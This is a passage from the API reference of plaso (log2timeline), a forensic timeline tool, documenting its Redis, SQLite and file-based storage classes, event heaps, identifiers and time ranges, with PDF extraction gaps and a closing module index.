• serialized_data (Optional[bytes]) – serialized form of the analysis report.

Raises

• IOError – when the storage writer is closed.

• OSError – when the storage writer is closed.

AddEvent(event, serialized_data=None)Adds an event.

Parameters


• serialized_data (bytes) – serialized form of the event.

Raises



• IOError – when the storage writer is closed or if the event data identifier type is notsupported.

• OSError – when the storage writer is closed or if the event data identifier type is notsupported.

AddEventData(event_data, serialized_data=None)Adds event data.

Parameters


• serialized_data (bytes) – serialized form of the event data.

Raises



AddEventDataStream(event_data_stream, serialized_data=None)Adds an event data stream.

Parameters


• serialized_data (bytes) – serialized form of the event data stream.

Raises



AddEventSource(event_source, serialized_data=None)Adds an event source.

Parameters

• event_source (EventSource) – event source.

• serialized_data (Optional[bytes]) – serialized form of the event source.

Raises



AddEventTag(event_tag, serialized_data=None)Adds an event tag.

Parameters


• serialized_data (Optional[bytes]) – serialized form of the event tag.

Raises



AddWarning(warning, serialized_data=None)Adds a warnings.



Parameters

• warning (ExtractionWarning) – warning.

• serialized_data (Optional[bytes]) – serialized form of the warning.

Raises



CheckTaskReadyForMerge(task)Checks if a task is ready for merging into the session store.


Returns True if the task is ready to be merged.

Return type bool

Raises

• IOError – if the task storage type is not supported or the storage writer for the task doesnot exist.

• OSError – if the task storage type is not supported or the storage writer for the task doesnot exist.

Close()Closes the storage writer.

Raises



CreateTaskStorage(task, task_storage_format)Creates a task storage.

Parameters

• task (Task) – task.

• task_storage_format (str) – storage format to store task results.

Returns storage writer.

Return type FakeStorageWriter

Raises

• IOError – if the task storage already exists.

• OSError – if the task storage already exists.

FinalizeTaskStorage(task)Finalizes a processed task storage.


Raises

• IOError – if the task storage does not exist.

• OSError – if the task storage does not exist.



GetEventData()Retrieves the event data.

Returns event data generator.

Return type generator(EventData)

GetEventDataByIdentifier(identifier)Retrieves specific event data.

Parameters identifier (AttributeContainerIdentifier) – event data identifier.

Returns event data or None if not available.


GetEventDataStreamByIdentifier(identifier)Retrieves a specific event data stream.

Parameters identifier (AttributeContainerIdentifier) – event data streamidentifier.

Returns event data stream or None if not available.

Return type EventDataStream

GetEventSources()Retrieves the event sources.

Returns event source generator.

Return type generator(EventSource)

GetEventTags()Retrieves the event tags.

Returns event tag generator.

Return type generator(EventTags)

GetEvents()Retrieves the events.

Returns event generator.

Return type generator(EventObject)

GetFirstWrittenEventSource()Retrieves the first event source that was written after open.

Using GetFirstWrittenEventSource and GetNextWrittenEventSource newly added event sources can beretrieved in order of addition.

Returns event source or None if there are no newly written ones.

Return type EventSource

Raises



GetNextWrittenEventSource()Retrieves the next event source that was written after open.





Raises



GetSortedEvents(time_range=None)Retrieves the events in increasing chronological order.

Parameters time_range (Optional[TimeRange]) – time range used to filter events thatfall in a specific period.



Raises



GetWarnings()Retrieves the warnings.

Returns warning generator.

Return type generator(ExtractionWarning)

Open(**unused_kwargs)Opens the storage writer.

Raises

• IOError – if the storage writer is already opened.

• OSError – if the storage writer is already opened.

PrepareMergeTaskStorage(task)Prepares a task storage for merging.


Raises



RemoveProcessedTaskStorage(task)Removes a processed task storage.


Raises



SetSerializersProfiler(serializers_profiler)Sets the serializers profiler.

Parameters serializers_profiler (SerializersProfiler) – serializers profiler.

SetStorageProfiler(storage_profiler)Sets the storage profiler.



Parameters storage_profiler (StorageProfiler) – storage profiler.

WriteSessionCompletion(aborted=False)Writes session completion information.

Parameters aborted (Optional[bool]) – True if the session was aborted.

Raises

• IOError – if the storage type does not support writing a session completion or when thestorage writer is closed.

• OSError – if the storage type does not support writing a session completion or when thestorage writer is closed.

WriteSessionConfiguration()Writes session configuration information.

Raises

• IOError – if the storage type does not support writing session configuration informationor when the storage writer is closed.

• OSError – if the storage type does not support writing session configuration informationor when the storage writer is closed.

WriteSessionStart()Writes session start information.

Raises

• IOError – if the storage type does not support writing a session start or when the storagewriter is closed.

• OSError – if the storage type does not support writing a session start or when the storagewriter is closed.

WriteTaskCompletion(aborted=False)Writes task completion information.


Raises

• IOError – if the storage type does not support writing a task completion or when thestorage writer is closed.

• OSError – if the storage type does not support writing a task completion or when thestorage writer is closed.

WriteTaskStart()Writes task start information.

Raises

• IOError – if the storage type does not support writing a task start or when the storagewriter is closed.

• OSError – if the storage type does not support writing a task start or when the storagewriter is closed.



Module contents

plaso.storage.redis package

Submodules

plaso.storage.redis.merge_reader module

Redis merge reader.

class plaso.storage.redis.merge_reader.RedisMergeReader(storage_writer, task, re-dis_client=None)

Bases: plaso.storage.interface.StorageMergeReader

Redis store reader for merging.

MergeAttributeContainers(callback=None, maximum_number_of_containers=0)Reads attribute containers from a task store into the writer.

Parameters

• callback (Optional[function[StorageWriter,AttributeContainer]]) – function to call after each attribute container isdeserialized.

• maximum_number_of_containers (Optional[int]) – maximum number ofcontainers to merge, where 0 represent no limit.

Returns True if the entire task storage file has been merged.

Return type bool

Raises RuntimeError – if the add method for the active attribute container type is missing.

plaso.storage.redis.reader module

Redis reader.

class plaso.storage.redis.reader.RedisStorageReader(task)Bases: plaso.storage.interface.StorageReader

Redis storage file reader.

Close()Closes the storage reader.

GetAnalysisReports()Retrieves the analysis reports.

Returns analysis report generator.

Return type generator(AnalysisReport)














GetEventDataStreams()Retrieves the event data streams.

Returns event data stream generator.

Return type generator(EventDataStream)

GetEventSources()Retrieves event sources.



GetEventTagByIdentifier(identifier)Retrieves a specific event tag.

Parameters identifier (AttributeContainerIdentifier) – event tag identifier.

Returns event tag or None if not available.

Return type EventTag







GetNumberOfAnalysisReports()Retrieves the number analysis reports.

Returns number of analysis reports.

Return type int

GetNumberOfEventSources()Retrieves the number of event sources.

Returns number of event sources.



Return type int

GetSessions()Retrieves the sessions.

Returns session generator.

Return type generator(Session)


This includes all events written to the storage including those pending being flushed (written) to the storage.





Returns extraction warning generator.


HasAnalysisReports()Determines if a store contains analysis reports.

Returns True if the store contains analysis reports.

Return type bool

HasEventTags()Determines if a store contains event tags.

Returns True if the store contains event tags.

Return type bool

HasWarnings()Determines if a store contains extraction warnings.

Returns True if the store contains extraction warnings.

Return type bool

IsFinalized()Checks if the store has been finalized.

Returns True if the store has been finalized.

Return type bool

Open()Opens the storage reader.

ReadSystemConfiguration(knowledge_base)Reads system configuration information.

The system configuration contains information about various system specific configuration data, for exam-ple the user accounts.

Parameters knowledge_base (KnowledgeBase) – is used to store the preprocessing in-formation.






Parameters storage_profiler (StorageProfiler) – storage profile.

plaso.storage.redis.redis_store module

Redis store.

Only supports task storage at the moment.

class plaso.storage.redis.redis_store.RedisStore(storage_type='task', ses-sion_identifier=None,task_identifier=None)

Bases: plaso.storage.interface.BaseStore

Redis store.

Attribute containers are stored as Redis Hashes. All keys are prefixed with the session identifier to avoid colli-sions. Event identifiers are also stored in an index to enable sorting.


Parameters


• serialized_data (Optional[bytes]) – serialized form of the event.

Close()Closes the store.

DEFAULT_REDIS_URL = 'redis://127.0.0.1/0'

Finalize()Marks a store as finalized.

No further attribute containers will be written to a finalized store.

GetSerializedAttributeContainers(container_type, cursor, maximum_number_of_items)Fetches serialized attribute containers.

Parameters

• container_type (str) – attribute container type.

• cursor (int) – Redis cursor.

• maximum_number_of_items (int) – maximum number of containers to retrieve,where 0 represent no limit.

Returns

containing: int: Redis cursor. list[bytes]: serialized attribute containers.

Return type tuple




Parameters time_range (Optional[TimeRange]) – This argument is not supported bythe Redis store.

Yields EventObject – event.

Raises RuntimeError – if a time_range argument is specified.

IsFinalized()Checks if a store has been finalized.

Returns True if the store has been finalized.

Return type bool

classmethod MarkTaskAsMerging(task_identifier, session_identifier, redis_client=None,url=None)

Marks a finalized task as pending merge.

Parameters

• task_identifier (str) – identifier of the task.

• session_identifier (str) – session identifier, formatted as a UUID.

• redis_client (Optional[Redis]) – Redis client to query. If specified, no newclient will be created.

• url (Optional[str]) – URL for a Redis database. If not specified, RE-DIS_DEFAULT_URL will be used.

Raises

• IOError – if the task being updated is not finalized.

• OSError – if the task being updated is not finalized.

Open(redis_client=None, url=None, **unused_kwargs)Opens the store.

Parameters

• redis_client (Optional[Redis]) – Redis client to query. If specified, no newclient will be created. If no client is specified a new client will be opened connected to theRedis instance specified by ‘url’.

• url (Optional[str]) – URL for a Redis database. If not specified, the DE-FAULT_REDIS_URL will be used.

Raises

• IOError – if the store is already connected to a Redis instance.

• OSError – if the store is already connected to a Redis instance.

Remove()Removes the contents of the store from Redis.

RemoveAttributeContainer(container_type, identifier)Removes an attribute container from the store.

Parameters

• container_type (str) – container type attribute of the container being removed.

• identifier (AttributeContainerIdentifier) – event data identifier.

RemoveAttributeContainers(container_type, container_identifiers)Removes multiple attribute containers from the store.



Parameters

• container_type (str) – container type attribute of the container being removed.

• container_identifiers (list[AttributeContainerIdentifier]) –event data identifier.

classmethod ScanForProcessedTasks(session_identifier, redis_client=None, url=None)Scans a Redis database for processed tasks.

Parameters

• session_identifier (str) – session identifier, formatted as a UUID.

• redis_client (Optional[Redis]) – Redis client to query. If specified, no newclient will be created.

• url (Optional[str]) – URL for a Redis database. If not specified, RE-DIS_DEFAULT_URL will be used.

Returns

containing

list[str]: identifiers of processed tasks, which may be empty if the connection to Re-dis times out.

Redis: Redis client used for the query.

Return type tuple

plaso.storage.redis.writer module

Storage writer for Redis.

class plaso.storage.redis.writer.RedisStorageWriter(session, storage_type='task',task=None)


Redis-based storage writer.

AddAnalysisReport(analysis_report)Adds an analysis report.

Parameters analysis_report (AnalysisReport) – a report.


Parameters

• event (EventObject) – an event.


AddEventData(event_data, serialized_data=None)Adds an event data.

Parameters

• event_data (EventData) – an event.

• serialized_data (Optional[bytes]) – serialized form of the event data.




Parameters


• serialized_data (Optional[bytes]) – serialized form of the event data stream.


Parameters

• event_source (EventSource) – an event source.



Parameters

• event_tag (EventTag) – an event tag.


AddWarning(warning, serialized_data=None)Adds a warning.

Parameters

• warning (ExtractionWarning) – a warning.


CheckTaskReadyForMerge(task)Checks if a task is ready for merging into the store.



Return type bool


Raises

• IOError – if the storage writer is closed.

• OSError – if the storage writer is closed.


Parameters



Raises

• IOError – always, as creating a task is not supported by the Redis store.

• OSError – always, as creating a task is not supported by the Redis store.





Raises

• IOError – always, as creating a finalizing a task storage is not supported by the Redisstore.

• OSError – always, as creating a finalizing a task storage is not supported by the Redisstore.














Returns None as there are no newly written event sources.


Raises




Returns None as there are no newly written event sources.


Raises










Raises



Open(redis_client=None, **unused_kwargs)Opens the storage writer.

Raises







Parameters knowledge_base (KnowledgeBase) – is used to store the preprocessing in-formation.

Raises

• IOError – always, as the Redis store does not support preprocessing information.

• OSError – always, as the Redis store does not support preprocessing information.



Raises

• IOError – always, as the Redis store does not support removing a task store.

• OSError – always, as the Redis store does not support removing a task store.





WritePreprocessingInformation(knowledge_base)Writes preprocessing information.



Parameters knowledge_base (KnowledgeBase) – contains the preprocessing informa-tion.

Raises

• IOError – always as the Redis store does not support preprocessing information.

• OSError – always as the Redis store does not support preprocessing information.



Raises

• IOError – always, as the Redis store does not support writing a session completion.

• OSError – always, as the Redis store does not support writing a session completion.


Raises

• IOError – always, as the Redis store does not support writing a session configuration.

• OSError – always, as the Redis store does not support writing a session configuration.


Raises

• IOError – always, as the Redis store does not support writing a session start.

• OSError – always, as the Redis store does not support writing a session start.



Raises

• IOError – if the storage type is not supported or when the storage writer is closed.

• OSError – if the storage type is not supported or when the storage writer is closed.


Raises

• IOError – if the storage type does not support writing a task start or when the storagewriter is closed.

• OSError – if the storage type does not support writing a task start or when the storagewriter is closed.



Module contents

plaso.storage.sqlite package

Submodules

plaso.storage.sqlite.merge_reader module

Merge reader for SQLite storage files.

class plaso.storage.sqlite.merge_reader.SQLiteStorageMergeReader(storage_writer,path)

Bases: plaso.storage.interface.StorageMergeReader

SQLite-based storage file reader for merging.

MergeAttributeContainers(callback=None, maximum_number_of_containers=0)Reads attribute containers from a task storage file into the writer.

Parameters

• callback (function[StorageWriter, AttributeContainer]) – functionto call after each attribute container is deserialized.



Return type bool

Raises

• RuntimeError – if the add method for the active attribute container type is missing.

• OSError – if the task storage file cannot be deleted.

• ValueError – if the maximum number of containers is a negative value.

plaso.storage.sqlite.reader module

Reader for SQLite storage files.

class plaso.storage.sqlite.reader.SQLiteStorageFileReader(path)Bases: plaso.storage.file_interface.StorageFileReader

SQLite-based storage file reader.

plaso.storage.sqlite.sqlite_file module

SQLite-based storage.

class plaso.storage.sqlite.sqlite_file.SQLiteStorageFile(maximum_buffer_size=0,storage_type='session')

Bases: plaso.storage.file_interface.BaseStorageFile

SQLite-based storage file.

format_versionstorage format version.



Type int

serialization_formatserialization format.

Type str

storage_typestorage type.

Type str


Parameters



Raises

• IOError – when the storage file is closed or read-only.

• OSError – when the storage file is closed or read-only.


Parameters



Raises




Parameters



Raises



classmethod CheckSupportedFormat(path, check_readable_only=False)Checks if the storage file format is supported.

Parameters

• path (str) – path to the storage file.

• check_readable_only (Optional[bool]) – whether the store should only bechecked to see if it can be read. If False, the store will be checked to see if it can be readand written to.

Returns True if the format is supported.



Return type bool

Close()Closes the file.

Raises

• IOError – if the storage file is already closed.

• OSError – if the storage file is already closed.

GetEventData()Retrieves event data.

Yields EventData – event data.


Parameters identifier (SQLTableIdentifier) – event data identifier.



Raises

• OSError – if an invalid identifier is provided.

• IOError – if an invalid identifier is provided.

GetEventSourceByIndex(index)Retrieves a specific event source.

Parameters index (int) – event source index.

Returns event source or None if not available.



Parameters identifier (SQLTableIdentifier) – event tag identifier.



Raises




Yields EventTag – event tag.



GetNumberOfEventSources()Retrieves the number event sources.




Return type int







Open(path=None, read_only=True, **unused_kwargs)Opens the storage.

Parameters

• path (Optional[str]) – path to the storage file.

• read_only (Optional[bool]) – True if the file should be opened in read-only mode.

Raises

• IOError – if the storage file is already opened or if the database cannot be connected.

• OSError – if the storage file is already opened or if the database cannot be connected.

• ValueError – if path is missing.

plaso.storage.sqlite.writer module

Storage writer for SQLite storage files.

class plaso.storage.sqlite.writer.SQLiteStorageFileWriter(session, output_file,storage_type='session',task=None)

Bases: plaso.storage.file_interface.StorageFileWriter

SQLite-based storage file writer.

CheckTaskReadyForMerge(task)Checks if a task is ready for merging with this session storage.



Return type bool

Raises

• IOError – if the storage type is not supported or if the temporary path for the task storagedoes not exist.

• OSError – if the storage type is not supported or if the temporary path for the task storagedoes not exist.


The task storage is used to store attribute containers created by the task.



Parameters


• task_storage_format (str) – storage format used to store task results.

Returns storage writer.

Return type StorageWriter

Raises

• OSError – if the storage type or storage format is not supported.

• IOError – if the storage type or storage format is not supported.

Module contents

Submodules

plaso.storage.event_heaps module

Heaps to sort events in chronological order.

class plaso.storage.event_heaps.EventHeapBases: object

Event heap.


Returns event.

Return type EventObject

PopEvents()Pops events from the heap.


PushEvent(event, event_index)Pushes an event onto the heap.

Parameters


• event_index (int) – index of the event in the storage.

property number_of_eventsnumber of serialized events on the heap.

Type int

class plaso.storage.event_heaps.SerializedEventHeapBases: object

Serialized event heap.

data_sizetotal data size of the serialized events on the heap.

Type int



Empty()Empties the heap.


Returns

containing:

int: event timestamp or None if the heap is empty bytes: serialized event or None if theheap is empty

Return type tuple

PushEvent(timestamp, event_data)Pushes a serialized event onto the heap.

Parameters

• timestamp (int) – event timestamp, which contains the number of micro seconds sinceJanuary 1, 1970, 00:00:00 UTC.

• event_data (bytes) – serialized event.

property number_of_eventsnumber of serialized events on the heap.

Type int

plaso.storage.event_tag_index module

The event tag index.

class plaso.storage.event_tag_index.EventTagIndexBases: object

Event tag index.

The event tag index is used to map event tags to events.

It is necessary for the ZIP storage files since previously stored event tags cannot be altered.

GetEventTagByIdentifier(storage_file, event_identifier)Retrieves the most recently updated event tag for an event.

Parameters

• storage_file (BaseStorageFile) – storage file.

• event_identifier (AttributeContainerIdentifier) – event attribute con-tainer identifier.

Returns event tag or None if the event has no event tag.


SetEventTag(event_tag)Sets an event tag in the index.

Parameters event_tag (EventTag) – event tag.



plaso.storage.factory module

This file contains the storage factory class.

class plaso.storage.factory.StorageFactoryBases: object

Storage factory.

classmethod CreateStorageFile(storage_format)Creates a storage file.

Parameters storage_format (str) – storage format.

Returns

a storage file or None if the storage file cannot be opened or the storage format is not sup-ported.

Return type StorageFile

classmethod CreateStorageReaderForFile(path)Creates a storage reader based on the file.

Parameters path (str) – path to the storage file.

Returns

a storage reader or None if the storage file cannot be opened or the storage format is notsupported.

Return type StorageReader

classmethod CreateStorageWriter(storage_format, session, path)Creates a storage writer.

Parameters

• storage_format (str) – storage format.

• session (Session) – session the storage changes are part of.


Returns

a storage writer or None if the storage file cannot be opened or the storage format is notsupported.


classmethod CreateStorageWriterForFile(session, path)Creates a storage writer based on the file.

Parameters

• session (Session) – session the storage changes are part of.


Returns

a storage writer or None if the storage file cannot be opened or the storage format is notsupported.




plaso.storage.file_interface module

Storage interface classes for file-backed stores.

class plaso.storage.file_interface.BaseStorageFileBases: plaso.storage.interface.BaseStore

Interface for file-based stores.

class plaso.storage.file_interface.SerializedAttributeContainerListBases: object

Serialized attribute container list.

The list is unsorted and pops attribute containers in the same order as pushed to preserve order.

The GetAttributeContainerByIndex method should be used to read attribute containers from the list while itbeing filled.

data_sizetotal data size of the serialized attribute containers on the list.

Type int

next_sequence_numbernext attribute container sequence number.

Type int

Empty()Empties the list.

GetAttributeContainerByIndex(index)Retrieves a specific serialized attribute container from the list.

Parameters index (int) – attribute container index.

Returns serialized attribute container data or None if not available.

Return type bytes

Raises IndexError – if the index is less than zero.

PopAttributeContainer()Pops a serialized attribute container from the list.

Returns serialized attribute container data or None if the list is empty.

Return type bytes

PushAttributeContainer(serialized_data)Pushes a serialized attribute container onto the list.

Parameters serialized_data (bytes) – serialized attribute container data.

property number_of_attribute_containersnumber of serialized attribute containers on the list.

Type int

class plaso.storage.file_interface.StorageFileMergeReader(storage_writer)Bases: plaso.storage.interface.StorageMergeReader

Storage reader interface for merging file-based stores.



class plaso.storage.file_interface.StorageFileReader(path)Bases: plaso.storage.interface.StorageReader

File-based storage reader interface.

Close()Closes the storage reader.





























Return type generator(EventTag)




GetFormatVersion()Retrieves the format version of the underlying storage file.

Returns the format version, or None if not available.

Return type int



Return type int

GetNumberOfEventSources()Retrieves the number of event sources.


Return type int

GetSerializationFormat()Retrieves the serialization format of the underlying storage file.

Returns the serialization format, or None if not available.

Return type str


Returns session generator.

Return type generator(Session)






GetStorageType()Retrieves the storage type of the underlying storage file.

Returns the storage type, or None if not available.

Return type str








Return type bool



Return type bool



Return type bool



Parameters knowledge_base (KnowledgeBase) – is used to store the system configura-tion.





class plaso.storage.file_interface.StorageFileWriter(session, output_file,storage_type='session',task=None)


Defines an interface for a file-backed storage writer.


Parameters



Raises




Parameters





Raises




Parameters



Raises




Parameters



Raises




Parameters



Raises




Parameters



Raises





AddWarning(warning, serialized_data=None)Adds an warning.

Parameters

• warning (ExtractionWarning) – an extraction warning.


Raises




Raises




Moves the task storage file from its temporary directory to the processed directory.


Raises

• IOError – if the storage type or format is not supported or if the storage file cannot berenamed.

• OSError – if the storage type or format is not supported or if the storage file cannot berenamed.





















Raises







Raises






Raises



GetProcessedTaskIdentifiers()Identifiers for tasks which have been processed.

Returns task identifiers that are processed.


Raises

• IOError – if the storage type is not supported or if the temporary path for the task storagedoes not exist.

• OSError – if the storage type is not supported or if the temporary path for the task storagedoes not exist.








Raises



Open(**unused_kwargs)Opens the storage writer.

Raises




Moves the task storage file from the processed directory to the merge directory.


Raises

• IOError – if the storage type or format is not supported or if the storage file cannot berenamed.

• OSError – if the storage type or format is not supported or if the storage file cannot berenamed.



Raises

• IOError – if the storage type or format is not supported or if the storage file cannot beremoved.

• OSError – if the storage type or format is not supported or if the storage file cannot beremoved.





StartMergeTaskStorage(task)Starts a merge of a task store with the session storage.


Returns storage merge reader of the task storage.

Return type StorageMergeReader



Raises

• IOError – if the storage file cannot be opened or if the storage type is not supported or ifthe temporary path for the task storage does not exist or if the temporary path for the taskstorage doe not refers to a file.

• OSError – if the storage file cannot be opened or if the storage type is not supported or ifthe temporary path for the task storage does not exist or if the temporary path for the taskstorage doe not refers to a file.

StartTaskStorage()Creates a temporary path for the task storage.

Raises

• IOError – if the storage type is not supported or if the temporary path for the task storagealready exists.

• OSError – if the storage type is not supported or if the temporary path for the task storagealready exists.

StopTaskStorage(abort=False)Removes the temporary path for the task storage.

The results of tasks will be lost on abort.

Parameters abort (bool) – True to indicate the stop is issued on abort.

Raises

• IOError – if the storage type is not supported.

• OSError – if the storage type is not supported.



Raises




Raises

• IOError – if the storage type does not support writing session configuration informationor when the storage writer is closed.

• OSError – if the storage type does not support writing session configuration informationor when the storage writer is closed.


Raises







Raises




Raises



plaso.storage.identifiers module

Storage attribute container identifier objects.

class plaso.storage.identifiers.FakeIdentifier(attribute_values_hash)Bases: plaso.containers.interface.AttributeContainerIdentifier

Fake attribute container identifier intended for testing.

attribute_values_hashhash value of the attribute values.

Type int



Return type str

class plaso.storage.identifiers.RedisKeyIdentifier(identifier=None)Bases: plaso.containers.interface.AttributeContainerIdentifier

Redis key attribute container identifier.

The identifier is used to uniquely identify attribute containers. Where for example an attribute container is storedas a JSON serialized data in a Redis instance.

identifierunique identifier of a container.

Type UUID



Return type str

class plaso.storage.identifiers.SQLTableIdentifier(name, row_identifier)Bases: plaso.containers.interface.AttributeContainerIdentifier

SQL table attribute container identifier.

The identifier is used to uniquely identify attribute containers. Where for example an attribute container is storedas a JSON serialized data in a SQLite database file.



namename of the table.

Type str

row_identifierunique identifier of the row in the table.

Type int



Return type str

class plaso.storage.identifiers.SerializedStreamIdentifier(stream_number,entry_index)

Bases: plaso.containers.interface.AttributeContainerIdentifier

Serialized stream attribute container identifier.

The identifier is used to uniquely identify attribute containers. Where for example an attribute container is storedas a JSON serialized data in a ZIP file.

stream_numbernumber of the serialized attribute container stream.

Type int

entry_indexnumber of the serialized event within the stream.

Type int



Return type str

plaso.storage.interface module

The storage interface classes.

class plaso.storage.interface.BaseStoreBases: object

Storage interface.

format_versionstorage format version.

Type int

serialization_formatserialization format.

Type str

storage_typestorage type.



Type str


Parameters




Parameters




Parameters




Parameters




Parameters

• event_source (EventSource) – event source.



Parameters



AddWarning(warning, serialized_data=None)Adds a warning.

Parameters

• warning (ExtractionWarning) – warning.


abstract Close()Closes the store.



























Raises










Return type generator(Event)



Return type int

GetNumberOfEventSources()Retrieves the number event sources.


Return type int


Yields Session – session attribute container.

Raises

• IOError – if there is a mismatch in session identifiers between the session start andcompletion attribute containers.

• OSError – if there is a mismatch in session identifiers between the session start andcompletion attribute containers.

abstract GetSortedEvents(time_range=None)Retrieves the events in increasing chronological order.

This includes all events written to the store including those pending being flushed (written) to the store.








Return type bool



Return type bool





Return type bool

abstract Open(**kwargs)Opens the storage.








WriteSessionCompletion(session_completion)Writes session completion information.

Parameters session_completion (SessionCompletion) – session completion infor-mation.

Raises

• IOError – if the storage type does not support writing a session completion or the storagefile is closed or read-only.

• OSError – if the storage type does not support writing a session completion or the storagefile is closed or read-only.

WriteSessionConfiguration(session_configuration)Writes session configuration information.

Parameters session_configuration (SessionConfiguration) – session configu-ration information.

Raises



WriteSessionStart(session_start)Writes session start information.

Parameters session_start (SessionStart) – session start information.

Raises

• IOError – if the storage type does not support writing a session start or the storage fileis closed or read-only.

• OSError – if the storage type does not support writing a session start or the storage fileis closed or read-only.



WriteTaskCompletion(task_completion)Writes task completion information.

Parameters task_completion (TaskCompletion) – task completion information.

Raises

• IOError – if the storage type does not support writing a task completion or the storagefile is closed or read-only.

• OSError – if the storage type does not support writing a task completion or the storagefile is closed or read-only.

WriteTaskStart(task_start)Writes task start information.

Parameters task_start (TaskStart) – task start information.

Raises

• IOError – if the storage type does not support writing a task start or the storage file isclosed or read-only.

• OSError – if the storage type does not support writing a task start or the storage file isclosed or read-only.

class plaso.storage.interface.StorageMergeReader(storage_writer)Bases: object

Storage reader interface for merging.

abstract MergeAttributeContainers(callback=None, maximum_number_of_containers=0)Reads attribute containers from a task store into the writer.

Parameters

• callback (function[StorageWriter, AttributeContainer]) – functionto call after each attribute container is deserialized.



Return type bool



class plaso.storage.interface.StorageReaderBases: object

Storage reader interface.

abstract Close()Closes the storage reader.

abstract GetAnalysisReports()Retrieves the analysis reports.

Yields AnalysisReport – analysis report.

abstract GetEventData()Retrieves the event data.



Yields EventData – event data.

abstract GetEventDataByIdentifier(identifier)Retrieves specific event data.




abstract GetEventDataStreamByIdentifier(identifier)Retrieves a specific event data stream.




abstract GetEventDataStreams()Retrieves the event data streams.

Yields EventDataStream – event data stream.

abstract GetEventSources()Retrieves event sources.

Yields EventSourceObject – event source.

abstract GetEventTagByIdentifier(identifier)Retrieves a specific event tag.




abstract GetEventTags()Retrieves the event tags.

Yields EventTag – event tag.

abstract GetEvents()Retrieves the events.


abstract GetNumberOfAnalysisReports()Retrieves the number analysis reports.


Return type int

abstract GetNumberOfEventSources()Retrieves the number of event sources.


Return type int

abstract GetSessions()Retrieves the sessions.

Yields Session – session.







abstract GetWarnings()Retrieves the warnings.

Yields ExtractionWarning – warning.

abstract HasAnalysisReports()Determines if a store contains analysis reports.


Return type bool

abstract HasEventTags()Determines if a store contains event tags.


Return type bool

abstract HasWarnings()Determines if a store contains extraction warnings.


Return type bool

abstract ReadSystemConfiguration(knowledge_base)Reads system configuration information.



abstract SetSerializersProfiler(serializers_profiler)Sets the serializers profiler.


abstract SetStorageProfiler(storage_profiler)Sets the storage profiler.


__enter__()Make usable with “with” statement.

__exit__(exception_type, value, traceback)Make usable with “with” statement.

class plaso.storage.interface.StorageWriter(session, storage_type='session', task=None)Bases: object

Storage writer interface.



number_of_analysis_reportsnumber of analysis reports written.

Type int

number_of_event_sourcesnumber of event sources written.

Type int

number_of_event_tagsnumber of event tags written.

Type int

number_of_eventsnumber of events written.

Type int

number_of_warningsnumber of warnings written.

Type int

abstract AddAnalysisReport(analysis_report, serialized_data=None)Adds an analysis report.

Parameters

• analysis_report (AnalysisReport) – a report.


abstract AddEvent(event, serialized_data=None)Adds an event.

Parameters



abstract AddEventData(event_data, serialized_data=None)Adds event data.

Parameters



abstract AddEventDataStream(event_data_stream, serialized_data=None)Adds an event data stream.

Parameters



abstract AddEventSource(event_source, serialized_data=None)Adds an event source.

Parameters





abstract AddEventTag(event_tag, serialized_data=None)Adds an event tag.

Parameters



abstract AddWarning(warning, serialized_data=None)Adds an warning.

Parameters

• warning (ExtractionWarning) – a warning.


abstract CheckTaskReadyForMerge(task)Checks if a task is ready for merging into the store.



Return type bool

abstract Close()Closes the storage writer.

CreateTaskStorage(task, task_storage_format)Creates a task store.

Parameters



Returns storage writer for the task store.


Raises NotImplementedError – since there is no implementation.




abstract GetEventDataByIdentifier(identifier)Retrieves specific event data.




abstract GetEventDataStreamByIdentifier(identifier)Retrieves a specific event data stream.






abstract GetEvents()Retrieves the events.


abstract GetFirstWrittenEventSource()Retrieves the first event source that was written after open.




abstract GetNextWrittenEventSource()Retrieves the next event source that was written after open.







abstract Open(**kwargs)Opens the storage writer.







abstract SetSerializersProfiler(serializers_profiler)Sets the serializers profiler.


abstract SetStorageProfiler(storage_profiler)Sets the storage profiler.


abstract WriteSessionCompletion(aborted=False)Writes session completion information.




abstract WriteSessionConfiguration()Writes session configuration information.

abstract WriteSessionStart()Writes session start information.

abstract WriteTaskCompletion(aborted=False)Writes task completion information.


abstract WriteTaskStart()Writes task start information.

plaso.storage.logger module

The storage sub module logger.

plaso.storage.time_range module

Storage time range objects.

class plaso.storage.time_range.TimeRange(start_timestamp, end_timestamp)Bases: object

Date and time range.

The timestamp are integers containing the number of microseconds since January 1, 1970, 00:00:00 UTC.

durationduration of the range in microseconds.

Type int

end_timestamptimestamp that marks the end of the range.

Type int

start_timestamptimestamp that marks the start of the range.

Type int

Module contents

5.1.15 plaso.unix package

Module contents

5.1.16 plaso.winnt package

Submodules

plaso.winnt.known_folder_ids module

This file contains the Windows NT Known Folder identifier definitions.



plaso.winnt.language_ids module

This file contains the Windows NT Language identifiers.

plaso.winnt.shell_folder_ids module

This file contains the Windows NT shell folder identifier definitions.

plaso.winnt.time_zones module

This file contains the Windows NT time zone definitions.

The Windows time zone names can be obtained from the following Windows Registry key:HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTime Zones

Module contents

5.2 Submodules

5.3 plaso.dependencies module

Functionality to check for the availability and version of dependencies.

This file is generated by l2tdevtools update-dependencies.py, any dependency related changes should be made independencies.ini.

plaso.dependencies.CheckDependencies(verbose_output=True)Checks the availability of the dependencies.

Parameters verbose_output (Optional[bool]) – True if output should be verbose.

Returns True if the dependencies are available, False otherwise.

Return type bool

5.4 Module contents

Super timeline all the things (Plaso Langar Að Safna Öllu).

log2timeline is a tool designed to extract timestamps from various files found on a typical computer system(s) andaggregate them. Plaso is the Python rewrite of log2timeline.

5.2. Submodules 491



CHAPTER

SIX

INDICES AND TABLES

• genindex

• modindex

• search

493


494 Chapter 6. Indices and tables

PYTHON MODULE INDEX

pplaso, 491plaso.analysis, 54plaso.analysis.browser_search, 39plaso.analysis.chrome_extension, 40plaso.analysis.definitions, 40plaso.analysis.file_hashes, 41plaso.analysis.hash_tagging, 41plaso.analysis.interface, 44plaso.analysis.logger, 45plaso.analysis.manager, 45plaso.analysis.mediator, 46plaso.analysis.nsrlsvr, 47plaso.analysis.sessionize, 49plaso.analysis.tagging, 49plaso.analysis.unique_domains_visited,

